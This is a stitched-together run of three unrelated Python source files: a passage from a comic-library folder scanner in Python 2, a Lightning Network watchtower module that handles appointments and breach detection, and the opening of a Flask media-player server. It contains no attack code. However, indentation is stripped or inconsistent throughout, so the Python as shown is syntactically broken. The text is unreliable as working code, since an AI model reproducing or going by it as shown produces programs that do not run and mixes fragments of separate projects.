if md.locations is not None:
for n in list(set(md.locations.split(","))):
self.location_names.add(n.strip())
if md.storyArc is not None:
for n in list(set(md.storyArc.split(","))):
self.storyarc_names.add(n.strip())
if md.genre is not None:
for n in list(set(md.genre.split(","))):
self.genre_names.add(n.strip())
if md.tags is not None:
for n in list(set(md.tags)):
self.generictag_names.add(n.strip())
if md.credits is not None:
for credit in md.credits:
self.person_names.add(credit['person'].strip())
self.role_names.add(credit['role'].lower().strip())
def saveChildInfoToDB(self, md_list):
character_names = set()
team_names = set()
location_names = set()
storyarc_names = set()
genre_names = set()
person_names = set()
role_names = set()
generictag_names = set()
for md in md_list:
if md.characters is not None:
for n in list(set(md.characters.split(","))):
character_names.add(n.strip())
if md.teams is not None:
for n in list(set(md.teams.split(","))):
team_names.add(n.strip())
if md.locations is not None:
for n in list(set(md.locations.split(","))):
location_names.add(n.strip())
if md.storyArc is not None:
for n in list(set(md.storyArc.split(","))):
storyarc_names.add(n.strip())
if md.genre is not None:
for n in list(set(md.genre.split(","))):
genre_names.add(n.strip())
if md.tags is not None:
for n in list(set(md.tags)):
generictag_names.add(n.strip())
if md.credits is not None:
for credit in md.credits:
person_names.add(credit['person'].strip())
role_names.add(credit['role'].lower().strip())
def addNamedObjects(cls, nameset):
q = self.session.query(cls.name)
existing_set = set([i[0] for i in list(q)])
nameset = nameset - existing_set
#logging.debug( "new {0} size = {1}".format( cls, len(nameset )))
for n in nameset:
obj = cls(name=n)
#print cls, n
self.session.add(obj)
# For each set, get the existing set of names in the DB,
# and get the difference set. With the set of only new names,
# insert them all
addNamedObjects(Character, character_names)
addNamedObjects(Team, team_names)
addNamedObjects(Location, location_names)
addNamedObjects(StoryArc, storyarc_names)
addNamedObjects(Genre, genre_names)
addNamedObjects(Person, person_names)
addNamedObjects(Role, role_names)
addNamedObjects(GenericTag, generictag_names)
self.session.commit()
def createChildDicts(self):
        # read back all those objects with their keys
character_objs = self.session.query(Character).all()
team_objs = self.session.query(Team).all()
location_objs = self.session.query(Location).all()
storyarc_objs = self.session.query(StoryArc).all()
genre_objs = self.session.query(Genre).all()
person_objs = self.session.query(Person).all()
role_objs = self.session.query(Role).all()
generictag_objs = self.session.query(GenericTag).all()
def buildDict(obj_list, objdict):
for o in obj_list:
objdict[o.name] = o
self.character_dict = dict()
self.team_dict = dict()
self.location_dict = dict()
self.storyarc_dict = dict()
self.genre_dict = dict()
self.person_dict = dict()
self.role_dict = dict()
self.generictag_dict = dict()
buildDict(character_objs, self.character_dict)
buildDict(team_objs, self.team_dict)
buildDict(location_objs, self.location_dict)
buildDict(storyarc_objs, self.storyarc_dict)
buildDict(genre_objs, self.genre_dict)
buildDict(person_objs, self.person_dict)
buildDict(role_objs, self.role_dict)
buildDict(generictag_objs, self.generictag_dict)
def setStatusDetail(self, detail, level=logging.DEBUG):
self.statusdetail = detail
if level == logging.DEBUG:
logging.debug(detail)
else:
logging.info(detail)
def dofullScan(self, dirs):
self.status = "SCANNING"
logging.info(u"Monitor: Beginning file scan...")
self.setStatusDetail(u"Monitor: Making a list of all files in the folders...")
filelist = utils.get_recursive_filelist( dirs )
self.setStatusDetail(u"Monitor: done listing files.")
self.add_count = 0
self.remove_count = 0
# get the entire comic table into memory
query = list(self.session.query(Comic))
# look for missing or changed files
self.setStatusDetail(u"Monitor: Removing missing or modified files from DB...")
#start_time = time.time()
for comic in query:
self.checkIfRemovedOrModified( comic, self.paths )
if self.quit:
self.setStatusDetail(u"Monitor: halting scan!")
return
#print time.time() - start_time, "seconds"
self.setStatusDetail(u"Monitor: Done removing files.")
if self.remove_count > 0:
self.dm.engine.echo = True
self.session.commit()
self.dm.engine.echo = False
self.setStatusDetail(u"Monitor: found {0} files to inspect...".format(len(filelist)))
# make a list of all path strings in comic table
db_pathlist = set([i[0] for i in list(self.session.query(Comic.path))])
filelist = set(filelist)
filelist = filelist - db_pathlist
db_pathlist = None
self.setStatusDetail(u"Monitor: {0} new files to scan...".format(len(filelist)), logging.INFO)
md_list = []
self.read_count = 0
for filename in filelist:
md = self.getComicMetadata( filename )
if md is not None:
md_list.append(md)
if self.read_count % 100 == 0 and self.read_count != 0:
self.setStatusDetail(u"Monitor: {0} of {1} scanned...".format(self.read_count,len(filelist)), logging.INFO)
if self.quit:
self.setStatusDetail(u"Monitor: halting scan!")
return
self.setStatusDetail(u"Monitor: finished scanning metadata in {0} of {1} files".format(self.read_count,len(filelist)), logging.INFO)
filelist = None
# now that all metadata is read in, make up lists of all the "named" entities to
# add to the DB before the actual comics are added
self.saveChildInfoToDB(md_list)
#logging.debug(u"Monitor: finish adding child sets")
        # create dictionaries of all those objects, so we don't have to query the database
self.createChildDicts()
        # sort the list so the most recently modified file goes in last
md_list = sorted(md_list, key=lambda md: md.mod_ts)
for md in md_list:
self.addComicFromMetadata( md )
if self.quit:
self.setStatusDetail(u"Monitor: halting scan!")
return
# periodically commit
if self.add_count % 1000 == 0:
self.session.commit()
self.setStatusDetail(u"Monitor: {0} of {1} added...".format(self.add_count,len(md_list)), logging.INFO)
if self.add_count > 0:
self.session.commit()
self.status = "IDLE"
self.statusdetail = ""
self.scancomplete_ts = int(time.mktime(datetime.utcnow().timetuple()) * 1000)
logging.info("Monitor: Added {0} comics".format(self.add_count))
logging.info("Monitor: Removed {0} comics".format(self.remove_count))
if self.remove_count > 0 or self.add_count > 0:
self.session.query(DatabaseInfo).first().last_updated = datetime.utcnow()
self.session.commit()
if self.quit_when_done:
self.quit = True
def doEventProcessing(self, eventList):
logging.debug(u"Monitor: event_list:{0}".format(eventList))
if __name__ == '__main__':
if len(sys.argv) < 2:
print >> sys.stderr, "usage: {0} comic_folder ".format(sys.argv[0])
sys.exit(-1)
utils.fix_output_encoding()
dm = DataManager()
dm.create()
m = Monitor(dm, sys.argv[1:])
m.quit_when_done = True
m.start()
m.scan()
#while True:
# time.sleep(10)
m.stop()
|
watcher.py
|
from queue import Queue
from threading import Thread
from collections import OrderedDict
from readerwriterlock import rwlock
from teos.logger import get_logger
import common.receipts as receipts
from common.appointment import AppointmentStatus
from common.tools import compute_locator
from common.exceptions import BasicException, EncryptionError, InvalidParameter, SignatureError
from common.cryptographer import Cryptographer, hash_160
from teos.cleaner import Cleaner
from teos.chain_monitor import ChainMonitor
from teos.gatekeeper import SubscriptionExpired
from teos.extended_appointment import ExtendedAppointment
from teos.block_processor import InvalidTransactionFormat
class AppointmentLimitReached(BasicException):
"""Raised when the tower maximum appointment count has been reached."""
class AppointmentAlreadyTriggered(BasicException):
"""
Raised when an appointment is sent to the Watcher but that same data has already been sent to the :obj:`Responder`.
"""
class AppointmentNotFound(BasicException):
"""Raised when an appointment is not found on the tower."""
class LocatorCache:
"""
The :obj:`LocatorCache` keeps the data about the last ``cache_size`` blocks around so appointments can be checked
against it. The data is indexed by locator and it's mainly built during the normal :obj:`Watcher` operation so no
extra steps are normally needed.
Args:
blocks_in_cache (:obj:`int`): the numbers of blocks to keep in the cache.
Attributes:
logger (:obj:`Logger <teos.logger.Logger>`): The logger for this component.
cache (:obj:`dict`): A dictionary of ``locator:dispute_txid`` pairs that received appointments are checked
against.
blocks (:obj:`OrderedDict`): An ordered dictionary of the last ``blocks_in_cache`` blocks
(``block_hash:locators``). Used to keep track of what data belongs to what block, so data can be pruned
accordingly. Also needed to rebuild the cache in case of reorgs.
cache_size (:obj:`int`): The size of the cache in blocks.
rw_lock (:obj:`RWLockWrite <rwlock.RWLockWrite>`): A lock object to manage access to the cache on updates.
"""
def __init__(self, blocks_in_cache):
self.logger = get_logger(component=LocatorCache.__name__)
self.cache = dict()
self.blocks = OrderedDict()
self.cache_size = blocks_in_cache
self.rw_lock = rwlock.RWLockWrite()
def init(self, last_known_block, block_processor):
"""
Sets the initial state of the locator cache.
Args:
last_known_block (:obj:`str`): the last known block by the :obj:`Watcher`.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): a block processor instance.
"""
# This is needed as a separate method from __init__ since it has to be initialized right before starting to watch.
# Not doing so would imply storing temporary variables in the Watcher and initialising the cache as None.
target_block_hash = last_known_block
for _ in range(self.cache_size):
# In some setups, like regtest, it could be the case that there are not enough previous blocks.
# In those cases we pull as many as we can (up to cache_size).
if not target_block_hash:
break
target_block = block_processor.get_block(target_block_hash, blocking=True)
if not target_block:
break
locator_txid_map = {compute_locator(txid): txid for txid in target_block.get("tx")}
self.cache.update(locator_txid_map)
self.blocks[target_block_hash] = list(locator_txid_map.keys())
target_block_hash = target_block.get("previousblockhash")
self.blocks = OrderedDict(reversed((list(self.blocks.items()))))
def get_txid(self, locator):
"""
Gets a txid from the locator cache.
Args:
locator (:obj:`str`): the locator to lookup in the cache.
Returns:
:obj:`str` or :obj:`None`: The txid linked to the given locator if found. None otherwise.
"""
with self.rw_lock.gen_rlock():
return self.cache.get(locator)
def update(self, block_hash, locator_txid_map):
"""
Updates the cache with data from a new block. Removes the oldest block if the cache is full after the addition.
Args:
block_hash (:obj:`str`): the hash of the new block.
locator_txid_map (:obj:`dict`): the dictionary of locators (locator:txid) derived from a list of transaction
ids.
"""
with self.rw_lock.gen_wlock():
self.cache.update(locator_txid_map)
self.blocks[block_hash] = list(locator_txid_map.keys())
self.logger.debug("Block added to cache", block_hash=block_hash)
if self.is_full():
self.remove_oldest_block()
def is_full(self):
""" Returns whether the cache is full or not."""
with self.rw_lock.gen_rlock():
full = len(self.blocks) > self.cache_size
return full
def remove_oldest_block(self):
""" Removes the oldest block from the cache."""
with self.rw_lock.gen_wlock():
block_hash, locators = self.blocks.popitem(last=False)
for locator in locators:
del self.cache[locator]
self.logger.debug("Block removed from cache", block_hash=block_hash)
def fix(self, last_known_block, block_processor):
"""
Fixes the cache after a reorg has been detected by feeding the most recent ``cache_size`` blocks to it.
Args:
last_known_block (:obj:`str`): the last known block hash after the reorg.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): a block processor instance.
"""
tmp_cache = LocatorCache(self.cache_size)
# We assume there are no reorgs back to genesis. If there were, this would raise some log warnings and the cache
# would be filled with fewer than cache_size blocks.
target_block_hash = last_known_block
for _ in range(tmp_cache.cache_size):
target_block = block_processor.get_block(target_block_hash, blocking=True)
if target_block:
# Compute the locator:txid pair for every transaction in the block and update both the cache and
# the block mapping.
locator_txid_map = {compute_locator(txid): txid for txid in target_block.get("tx")}
tmp_cache.cache.update(locator_txid_map)
tmp_cache.blocks[target_block_hash] = list(locator_txid_map.keys())
target_block_hash = target_block.get("previousblockhash")
with self.rw_lock.gen_wlock():
self.blocks = OrderedDict(reversed((list(tmp_cache.blocks.items()))))
self.cache = tmp_cache.cache
class Watcher:
"""
The :class:`Watcher` is in charge of watching for channel breaches for the appointments accepted by the tower.
The :class:`Watcher` keeps track of the accepted appointments in ``appointments`` and, for each newly received block,
checks if any breach has happened by comparing the txids with the appointment locators. If a breach is seen, the
``encrypted_blob`` of the corresponding appointment is decrypted and the data is passed to the
:obj:`Responder <teos.responder.Responder>`.
If an appointment reaches its end with no breach, the data is simply deleted.
The :class:`Watcher` receives information about newly received blocks via the ``block_queue`` that is populated by the
:obj:`ChainMonitor <teos.chain_monitor.ChainMonitor>`.
Args:
db_manager (:obj:`AppointmentsDBM <teos.appointments_dbm.AppointmentsDBM>`): an instance of the appointment
database manager to interact with the database.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): a block processor instance to
get blocks from bitcoind.
responder (:obj:`Responder <teos.responder.Responder>`): a responder instance.
sk (:obj:`PrivateKey`): a private key used to sign accepted appointments.
max_appointments (:obj:`int`): the maximum amount of appointments accepted by the :obj:`Watcher` at the same
time.
blocks_in_cache (:obj:`int`): the number of blocks to keep in cache so recently triggered appointments can be
covered.
Attributes:
appointments (:obj:`dict`): A dictionary containing a summary of the appointments (:obj:`ExtendedAppointment
<teos.extended_appointment.ExtendedAppointment>` instances) accepted by the tower (``locator`` and
``user_id``). It's populated through ``add_appointment``.
locator_uuid_map (:obj:`dict`): A ``locator:uuid`` map used to allow the :obj:`Watcher` to deal with several
appointments with the same ``locator``.
block_queue (:obj:`Queue`): A queue used by the :obj:`Watcher` to receive block hashes from ``bitcoind``. It is
populated by the :obj:`ChainMonitor <teos.chain_monitor.ChainMonitor>`.
db_manager (:obj:`AppointmentsDBM <teos.appointments_dbm.AppointmentsDBM>`): An instance of the appointment
database manager to interact with the database.
gatekeeper (:obj:`Gatekeeper <teos.gatekeeper.Gatekeeper>`): A gatekeeper instance in charge to control the
user access and subscription expiry.
block_processor (:obj:`BlockProcessor <teos.block_processor.BlockProcessor>`): A block processor instance to
get blocks from bitcoind.
responder (:obj:`Responder <teos.responder.Responder>`): A responder instance.
signing_key (:obj:`PrivateKey`): A private key used to sign accepted appointments.
max_appointments (:obj:`int`): The maximum amount of appointments accepted by the :obj:`Watcher` at the same
time.
last_known_block (:obj:`str`): The last block known by the :obj:`Watcher`.
locator_cache (:obj:`LocatorCache`): A cache of locators for the last ``blocks_in_cache`` blocks.
rw_lock (:obj:`RWLockWrite <rwlock.RWLockWrite>`): A lock object to manage access to the Watcher on updates.
Raises:
:obj:`InvalidKey`: if teos sk cannot be loaded.
"""
def __init__(self, db_manager, gatekeeper, block_processor, responder, sk, max_appointments, blocks_in_cache):
self.logger = get_logger(component=Watcher.__name__)
self.appointments = dict()
self.locator_uuid_map = dict()
self.block_queue = Queue()
self.db_manager = db_manager
self.gatekeeper = gatekeeper
self.block_processor = block_processor
self.responder = responder
self.max_appointments = max_appointments
self.signing_key = sk
self.last_known_block = db_manager.load_last_block_hash_watcher()
self.locator_cache = LocatorCache(blocks_in_cache)
self.rw_lock = rwlock.RWLockWrite()
@property
def tower_id(self):
"""Get the id of this tower, as a hex string."""
return Cryptographer.get_compressed_pk(self.signing_key.public_key)
@property
def n_registered_users(self):
"""Get the number of users currently registered to the tower."""
return self.gatekeeper.n_registered_users
@property
def n_watcher_appointments(self):
"""Get the total number of appointments stored in the watcher."""
with self.rw_lock.gen_rlock():
return len(self.appointments)
@property
def n_responder_trackers(self):
"""Get the total number of trackers in the responder."""
return self.responder.n_responder_trackers
def awake(self):
"""
Starts a new thread to monitor the blockchain for channel breaches. The thread will run until the
:obj:`ChainMonitor` adds ``ChainMonitor.END_MESSAGE`` to the queue.
Returns:
:obj:`Thread <threading.Thread>`: The thread object that was just created and is already running.
"""
watcher_thread = Thread(target=self.do_watch, daemon=True)
watcher_thread.start()
return watcher_thread
def register(self, user_id):
"""
Registers a user.
Args:
user_id (:obj:`str`): the public key that identifies the user (33-bytes hex str).
Returns:
:obj:`tuple`: A tuple containing the available slots, the subscription expiry, and the signature of the
registration receipt by the Watcher.
Raises:
:obj:`InvalidParameter`: if the user_id does not match the expected format.
:obj:`ConnectionRefusedError`: if bitcoind cannot be reached.
"""
available_slots, subscription_expiry, registration_receipt = self.gatekeeper.add_update_user(user_id)
signature = Cryptographer.sign(registration_receipt, self.signing_key)
return available_slots, subscription_expiry, signature
def get_appointment(self, locator, user_signature):
"""
Gets information about an appointment.
The appointment can either be in the watcher, the responder, or not found.
Args:
locator (:obj:`str`): a 16-byte hex-encoded value used by the tower to detect channel breaches.
user_signature (:obj:`str`): the signature of the request by the user.
Returns:
:obj:`tuple`: A tuple containing the appointment data and the status, either
``AppointmentStatus.BEING_WATCHED`` or ``AppointmentStatus.DISPUTE_RESPONDED``
Raises:
:obj:`AuthenticationFailure`: if the user cannot be authenticated.
:obj:`AppointmentNotFound`: if the appointment is not found in the tower.
:obj:`SubscriptionExpired`: If the user subscription has expired.
:obj:`ConnectionRefusedError`: If bitcoind cannot be reached.
"""
message = "get appointment {}".format(locator).encode("utf-8")
user_id = self.gatekeeper.authenticate_user(message, user_signature)
has_expired, expiry = self.gatekeeper.has_subscription_expired(user_id)
if has_expired:
raise SubscriptionExpired(f"Your subscription expired at block {expiry}")
uuid = hash_160("{}{}".format(locator, user_id))
with self.rw_lock.gen_rlock():
if uuid in self.appointments:
appointment_data = self.db_manager.load_watcher_appointment(uuid)
status = AppointmentStatus.BEING_WATCHED
elif self.responder.has_tracker(uuid):
appointment_data = self.db_manager.load_responder_tracker(uuid)
status = AppointmentStatus.DISPUTE_RESPONDED
else:
raise AppointmentNotFound("Cannot find {}".format(locator))
return appointment_data, status
def add_appointment(self, appointment, user_signature):
"""
Adds a new appointment to the ``appointments`` dictionary if ``max_appointments`` has not been reached.
``add_appointment`` is the entry point of the :obj:`Watcher`. Upon receiving a new appointment it will start
monitoring the blockchain (``do_watch``) until ``appointments`` is empty.
Once a breach is seen on the blockchain, the :obj:`Watcher` will decrypt the corresponding ``encrypted_blob``
and pass the information to the :obj:`Responder <teos.responder.Responder>`.
The tower may store multiple appointments with the same ``locator`` to avoid DoS attacks based on data
rewriting. ``locators`` should be derived from the ``dispute_txid``, but that task is performed by the user, and
the tower has no way of verifying whether or not they have been properly derived. Therefore, appointments are
identified by ``uuid`` and stored in ``appointments`` and ``locator_uuid_map``.
Args:
appointment (:obj:`Appointment <common.appointment.Appointment>`): the appointment to be added to the
:obj:`Watcher`.
user_signature (:obj:`str`): the user's appointment signature (hex-encoded).
Returns:
:obj:`dict`: The tower response as a dict, containing: ``locator``, ``signature``, ``available_slots`` and
``subscription_expiry``.
Raises:
:obj:`AppointmentLimitReached`: If the tower cannot hold more appointments (cap reached).
:obj:`AuthenticationFailure`: If the user cannot be authenticated.
:obj:`NotEnoughSlots`: If the user does not have enough available slots, so the appointment is rejected.
:obj:`SubscriptionExpired`: If the user subscription has expired.
:obj:`ConnectionRefusedError`: If bitcoind cannot be reached.
"""
with self.rw_lock.gen_wlock():
if len(self.appointments) >= self.max_appointments:
message = "Maximum appointments reached, appointment rejected"
self.logger.info(message, locator=appointment.locator)
raise AppointmentLimitReached(message)
user_id = self.gatekeeper.authenticate_user(appointment.serialize(), user_signature)
has_subscription_expired, expiry = self.gatekeeper.has_subscription_expired(user_id)
if has_subscription_expired:
raise SubscriptionExpired(f"Your subscription expired at block {expiry}")
start_block = self.block_processor.get_block(self.last_known_block).get("height")
extended_appointment = ExtendedAppointment(
appointment.locator,
appointment.encrypted_blob,
appointment.to_self_delay,
user_id,
user_signature,
start_block,
)
# The uuids are generated as the RIPEMD160(locator||user_pubkey).
# If an appointment is requested by the user the uuid can be recomputed and queried straightaway (no maps).
uuid = hash_160("{}{}".format(extended_appointment.locator, user_id))
# If this is a copy of an appointment we've already reacted to, the new appointment is rejected.
if self.responder.has_tracker(uuid):
message = "Appointment already in Responder"
self.logger.info(message)
raise AppointmentAlreadyTriggered(message)
# Add the appointment to the Gatekeeper
available_slots = self.gatekeeper.add_update_appointment(user_id, uuid, extended_appointment)
# Appointments that were triggered in blocks held in the cache
dispute_txid = self.locator_cache.get_txid(extended_appointment.locator)
if dispute_txid:
try:
penalty_txid, penalty_rawtx = self.check_breach(uuid, extended_appointment, dispute_txid)
receipt = self.responder.handle_breach(
uuid,
extended_appointment.locator,
dispute_txid,
penalty_txid,
penalty_rawtx,
user_id,
self.last_known_block,
)
# At this point the appointment is accepted but data is only kept if it goes through the Responder.
# Otherwise it is dropped.
if receipt.delivered:
self.db_manager.store_watcher_appointment(uuid, extended_appointment.to_dict())
self.db_manager.create_triggered_appointment_flag(uuid)
except (EncryptionError, InvalidTransactionFormat):
# If data inside the encrypted blob is invalid, the appointment is accepted but the data is dropped.
# (same as with data that bounces in the Responder). This reduces the appointment slot count so it
# could be used to discourage user misbehaviour.
pass
# Regular appointments that have not been triggered (or, at least, not recently)
else:
self.appointments[uuid] = extended_appointment.get_summary()
if extended_appointment.locator in self.locator_uuid_map:
# The locator is already being watched. If the uuid is not yet in the map, another user sent an appointment
# with the same locator, so both are kept; if it is already there, this is an update from the same user.
if uuid not in self.locator_uuid_map[extended_appointment.locator]:
self.locator_uuid_map[extended_appointment.locator].append(uuid)
else:
# First appointment seen for this locator.
self.locator_uuid_map[extended_appointment.locator] = [uuid]
self.db_manager.store_watcher_appointment(uuid, extended_appointment.to_dict())
try:
signature = Cryptographer.sign(
receipts.create_appointment_receipt(user_signature, start_block), self.signing_key
)
except (InvalidParameter, SignatureError):
# This should never happen since data is sanitized, just in case to avoid a crash
self.logger.error("Data couldn't be signed", appointment=extended_appointment.to_dict())
signature = None
self.logger.info("New appointment accepted", locator=extended_appointment.locator)
return {
"locator": extended_appointment.locator,
"start_block": extended_appointment.start_block,
"signature": signature,
"available_slots": available_slots,
"subscription_expiry": self.gatekeeper.get_user_info(user_id).subscription_expiry,
}
def do_watch(self):
"""
Monitors the blockchain for channel breaches.
This is the main method of the :obj:`Watcher` and the one in charge to pass appointments to the
:obj:`Responder <teos.responder.Responder>` upon detecting a breach.
"""
# Distinguish fresh bootstraps from bootstraps from db
if self.last_known_block is None:
self.last_known_block = self.block_processor.get_best_block_hash(blocking=True)
self.db_manager.store_last_block_hash_watcher(self.last_known_block)
# Initialise the locator cache with the last ``cache_size`` blocks.
self.locator_cache.init(self.last_known_block, self.block_processor)
while True:
block_hash = self.block_queue.get()
# When the ChainMonitor is stopped, a final ChainMonitor.END_MESSAGE message is sent
if block_hash == ChainMonitor.END_MESSAGE:
break
block = self.block_processor.get_block(block_hash, blocking=True)
self.logger.info(
"New block received", block_hash=block_hash, prev_block_hash=block.get("previousblockhash")
)
# If a reorg is detected, the cache is fixed to cover the last `cache_size` blocks of the new chain
if self.last_known_block != block.get("previousblockhash"):
self.locator_cache.fix(block_hash, self.block_processor)
txids = block.get("tx")
# Compute the locator for every transaction in the block and add them to the cache
locator_txid_map = {compute_locator(txid): txid for txid in txids}
self.locator_cache.update(block_hash, locator_txid_map)
with self.rw_lock.gen_wlock():
if len(self.appointments) > 0 and locator_txid_map:
outdated_appointments = self.gatekeeper.get_outdated_appointments(block["height"])
# Make sure we only try to delete what is on the Watcher (some appointments may have been triggered)
outdated_appointments = list(set(outdated_appointments).intersection(self.appointments.keys()))
Cleaner.delete_appointments(
outdated_appointments, self.appointments, self.locator_uuid_map, self.db_manager, outdated=True
)
valid_breaches, invalid_breaches = self.filter_breaches(self.get_breaches(locator_txid_map))
triggered_flags = []
appointments_to_delete = []
for uuid, breach in valid_breaches.items():
self.logger.info(
"Notifying responder and deleting appointment",
penalty_txid=breach["penalty_txid"],
locator=breach["locator"],
uuid=uuid,
)
receipt = self.responder.handle_breach(
uuid,
breach["locator"],
breach["dispute_txid"],
breach["penalty_txid"],
breach["penalty_rawtx"],
self.appointments[uuid].get("user_id"),
block_hash,
)
# FIXME: Only necessary because of the triggered appointment approach. Fix if it changes.
if receipt.delivered:
Cleaner.delete_appointment_from_memory(uuid, self.appointments, self.locator_uuid_map)
triggered_flags.append(uuid)
else:
appointments_to_delete.append(uuid)
# Appointments are only flagged as triggered if they are delivered, otherwise they are just deleted.
appointments_to_delete.extend(invalid_breaches)
appointments_to_delete_gatekeeper = {
uuid: self.appointments[uuid].get("user_id") for uuid in appointments_to_delete
}
self.db_manager.batch_create_triggered_appointment_flag(triggered_flags)
Cleaner.delete_appointments(
appointments_to_delete, self.appointments, self.locator_uuid_map, self.db_manager
)
# Remove invalid appointments from the Gatekeeper
self.gatekeeper.delete_appointments(appointments_to_delete_gatekeeper)
if not self.appointments:
self.logger.info("No more pending appointments")
# Register the last processed block for the Watcher
self.db_manager.store_last_block_hash_watcher(block_hash)
self.last_known_block = block.get("hash")
self.block_queue.task_done()
def get_breaches(self, locator_txid_map):
"""
Gets a dictionary of channel breaches given a map of ``locator:dispute_txid``.
Args:
locator_txid_map (:obj:`dict`): the dictionary of locators (locator:txid) derived from a list of
transaction ids.
Returns:
:obj:`dict`: A dictionary (``locator:txid``) with all the breaches found. An empty dictionary if none are
found.
"""
# Check if any of the tx_ids in the received block is an actual match
intersection = set(self.locator_uuid_map.keys()).intersection(locator_txid_map.keys())
breaches = {locator: locator_txid_map[locator] for locator in intersection}
if len(breaches) > 0:
self.logger.info("List of breaches", breaches=breaches)
else:
self.logger.info("No breaches found")
return breaches
def check_breach(self, uuid, appointment, dispute_txid):
"""
Checks if a breach is valid. Valid breaches should decrypt to a valid transaction.
Args:
uuid (:obj:`str`): the uuid of the appointment that was triggered by the breach.
appointment (:obj:`ExtendedAppointment <teos.extended_appointment.ExtendedAppointment>`): the appointment
data.
dispute_txid (:obj:`str`): the id of the transaction that triggered the breach.
Returns:
:obj:`tuple`: A tuple containing the penalty txid and the raw penalty tx.
Raises:
:obj:`EncryptionError`: if the encrypted blob from the provided appointment cannot be decrypted with the
key derived from the breach transaction id.
:obj:`InvalidTransactionFormat`: if the decrypted data does not have a valid transaction format.
"""
try:
penalty_rawtx = Cryptographer.decrypt(appointment.encrypted_blob, dispute_txid)
penalty_tx = self.block_processor.decode_raw_transaction(penalty_rawtx, blocking=True)
except EncryptionError as e:
self.logger.info("Transaction cannot be decrypted", uuid=uuid)
raise e
except InvalidTransactionFormat as e:
self.logger.info("The breach contained an invalid transaction", uuid=uuid)
raise e
self.logger.info(
"Breach found for locator", locator=appointment.locator, uuid=uuid, penalty_txid=penalty_tx.get("txid")
)
return penalty_tx.get("txid"), penalty_rawtx
def filter_breaches(self, breaches):
"""
Filters the valid from the invalid channel breaches.
The :obj:`Watcher` cannot know if an ``encrypted_blob`` contains a valid transaction until a breach is seen.
Blobs that contain arbitrary data are dropped and not sent to the :obj:`Responder <teos.responder.Responder>`.
Args:
breaches (:obj:`dict`): a dictionary containing channel breaches (``locator:txid``).
Returns:
:obj:`tuple`: A dictionary and a list. The former contains the valid breaches, while the latter contains the
invalid ones.
The valid breaches dictionary has the following structure:
``{locator, dispute_txid, penalty_txid, penalty_rawtx}``
"""
valid_breaches = {}
invalid_breaches = []
# A cache of the already decrypted blobs so repeated decryption can be avoided
decrypted_blobs = {}
for locator, dispute_txid in breaches.items():
for uuid in self.locator_uuid_map[locator]:
appointment = ExtendedAppointment.from_dict(self.db_manager.load_watcher_appointment(uuid))
if appointment.encrypted_blob in decrypted_blobs:
penalty_txid, penalty_rawtx = decrypted_blobs[appointment.encrypted_blob]
valid_breaches[uuid] = {
"locator": appointment.locator,
"dispute_txid": dispute_txid,
"penalty_txid": penalty_txid,
"penalty_rawtx": penalty_rawtx,
}
else:
try:
penalty_txid, penalty_rawtx = self.check_breach(uuid, appointment, dispute_txid)
valid_breaches[uuid] = {
"locator": appointment.locator,
"dispute_txid": dispute_txid,
"penalty_txid": penalty_txid,
"penalty_rawtx": penalty_rawtx,
}
decrypted_blobs[appointment.encrypted_blob] = (penalty_txid, penalty_rawtx)
except (EncryptionError, InvalidTransactionFormat):
invalid_breaches.append(uuid)
return valid_breaches, invalid_breaches
def get_registered_user_ids(self):
return self.gatekeeper.user_ids
def get_user_info(self, user_id):
"""
Returns the data held by the tower about the user given an ``user_id``.
Args:
user_id (:obj:`str`): the id of the requested user.
Returns:
:obj:`UserInfo <teos.gatekeeper.UserInfo>` or :obj:`None`: The user data if found. :obj:`None` if not found,
or the ``user_id`` is invalid.
"""
return self.gatekeeper.get_user_info(user_id)
def get_subscription_info(self, signature):
"""
Gets information about a user's subscription.
Args:
signature (:obj:`str`): the signature of the request by the user.
Returns:
:obj:`tuple`: A 2-item tuple containing the user info (:obj:`UserInfo <teos.gatekeeper.UserInfo>`) and the
list of locators associated with the appointments that match the subscription.
Raises:
:obj:`AuthenticationFailure`: if the user cannot be authenticated.
:obj:`SubscriptionExpired`: If the user subscription has expired.
:obj:`ConnectionRefusedError`: If bitcoind cannot be reached.
"""
message = "get subscription info".encode("utf-8")
user_id = self.gatekeeper.authenticate_user(message, signature)
has_expired, expiry = self.gatekeeper.has_subscription_expired(user_id)
if has_expired:
raise SubscriptionExpired(f"Your subscription expired at block {expiry}")
subscription_info = self.gatekeeper.get_user_info(user_id)
with self.rw_lock.gen_rlock():
locators = []
for appt_uuid in subscription_info.appointments:
if appt_uuid in self.appointments:
locators.append(self.appointments.get(appt_uuid).get("locator"))
elif self.responder.has_tracker(appt_uuid):
locators.append(self.responder.get_tracker(appt_uuid).get("locator"))
else:
self.logger.debug("The appointment uuid was not found in the watcher or the responder.")
return subscription_info, locators
def get_all_watcher_appointments(self):
"""Returns a dictionary with all the appointment stored in the db for the watcher."""
return self.db_manager.load_watcher_appointments()
def get_all_responder_trackers(self):
"""Returns a dictionary with all the trackers stored in the db for the responder."""
return self.db_manager.load_responder_trackers()
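# A minimal sketch of the LocatorCache pruning behaviour, using made-up locator/txid
# strings instead of real block data. It assumes the teos package and its logger are
# importable, and it only runs when this module is executed directly.
if __name__ == "__main__":
    demo_cache = LocatorCache(blocks_in_cache=2)
    # Feed three fake blocks with one locator each; once the third one is added the
    # cache exceeds its size and the oldest block (and its locator) is pruned.
    demo_cache.update("block_hash_1", {"locator_1": "txid_1"})
    demo_cache.update("block_hash_2", {"locator_2": "txid_2"})
    demo_cache.update("block_hash_3", {"locator_3": "txid_3"})
    assert demo_cache.get_txid("locator_1") is None  # pruned along with block_hash_1
    assert demo_cache.get_txid("locator_3") == "txid_3"  # still cached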
|
main.py
|
from threading import Thread
from flask import Flask, render_template
from flask_socketio import SocketIO, emit
import logging
from time import sleep
from classes.MediaPlayer import MediaPlayer
from classes.MediaPlayerConfig import MediaPlayerConfig
import pyudev
config = MediaPlayerConfig('media_player.conf')
cad = None
try:
from classes.MediaPlayerPiFaceCAD import MediaPlayerPiFaceCAD
from pifacecad.core import NoPiFaceCADDetectedError
cad = MediaPlayerPiFaceCAD(config)
except ImportError:
print('NO PIFACECAD LIBRARY FOUND')
except NoPiFaceCADDetectedError:
print('NO PIFACECAD FOUND')
media_player = MediaPlayer(config)
# Web server configuration
app = Flask(__name__, template_folder="web", static_folder="web/static", static_url_path="/static")
app.debug = False
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
socket = SocketIO(app, async_mode='threading')
@app.route('/')
def index():
return render_template('index.html')
